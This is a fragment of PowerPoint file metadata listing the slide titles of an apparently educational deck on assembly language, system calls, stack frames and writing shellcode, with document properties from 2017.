      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>어셈블리 기본 지식</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>어셈블리 기본 지식</vt:lpstr>
      <vt:lpstr>1. 범용 레지스터</vt:lpstr>
      <vt:lpstr>1. 범용 레지스터</vt:lpstr>
      <vt:lpstr>2. 포인터 레지스터</vt:lpstr>
      <vt:lpstr>어셈블리 기본 명령어</vt:lpstr>
      <vt:lpstr>어셈블리 기본 명령어</vt:lpstr>
      <vt:lpstr>어셈블리 기본 명령어</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>개발 환경</vt:lpstr>
      <vt:lpstr>Hello, World!</vt:lpstr>
      <vt:lpstr>Hello, World!</vt:lpstr>
      <vt:lpstr>Hello, World!</vt:lpstr>
      <vt:lpstr>Hello, World!</vt:lpstr>
      <vt:lpstr>Hello, World!</vt:lpstr>
      <vt:lpstr>Hello, World!</vt:lpstr>
      <vt:lpstr>Hello, World!</vt:lpstr>
      <vt:lpstr>Hello, World!</vt:lpstr>
      <vt:lpstr>System Call?</vt:lpstr>
      <vt:lpstr>System Call?</vt:lpstr>
      <vt:lpstr>Your name</vt:lpstr>
      <vt:lpstr>Your name</vt:lpstr>
      <vt:lpstr>Your name</vt:lpstr>
      <vt:lpstr>Your name</vt:lpstr>
      <vt:lpstr>Your name</vt:lpstr>
      <vt:lpstr>Your name</vt:lpstr>
      <vt:lpstr>Your name</vt:lpstr>
      <vt:lpstr>Your name</vt:lpstr>
      <vt:lpstr>Your name</vt:lpstr>
      <vt:lpstr>Your name</vt:lpstr>
      <vt:lpstr>Stack Frame</vt:lpstr>
      <vt:lpstr>Stack Frame</vt:lpstr>
      <vt:lpstr>Stack Frame</vt:lpstr>
      <vt:lpstr>Stack Frame</vt:lpstr>
      <vt:lpstr>Stack Frame</vt:lpstr>
      <vt:lpstr>Stack Frame</vt:lpstr>
      <vt:lpstr>Stack Frame</vt:lpstr>
      <vt:lpstr>Stack Frame</vt:lpstr>
      <vt:lpstr>Stack Frame</vt:lpstr>
      <vt:lpstr>Stack Frame</vt:lpstr>
      <vt:lpstr>Let’s make shell code!</vt:lpstr>
      <vt:lpstr>Finally, Let’s make Shell Code</vt:lpstr>
      <vt:lpstr>Finally, Let’s make Shell Code</vt:lpstr>
      <vt:lpstr>Finally, Let’s make Shell Code</vt:lpstr>
      <vt:lpstr>Finally, Let’s make Shell Code</vt:lpstr>
      <vt:lpstr>Finally, Let’s make Shell Code</vt:lpstr>
      <vt:lpstr>Finally, Let’s make Shell Code</vt:lpstr>
      <vt:lpstr>Finally, Let’s make Shell Code</vt:lpstr>
      <vt:lpstr>Finally, Let’s make Shell Code</vt:lpstr>
      <vt:lpstr>Finally, Let’s make Shell Code</vt:lpstr>
      <vt:lpstr>Finally, Let’s make Shell Code</vt:lpstr>
      <vt:lpstr>Finally, Let’s make Shell Code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Chell Sode</dc:title>
  <cp:lastModifiedBy>SH Kim</cp:lastModifiedBy>
  <cp:revision>93</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-08-27T02:11:11Z</dcterms:modified>
</cp:coreProperties>
</file>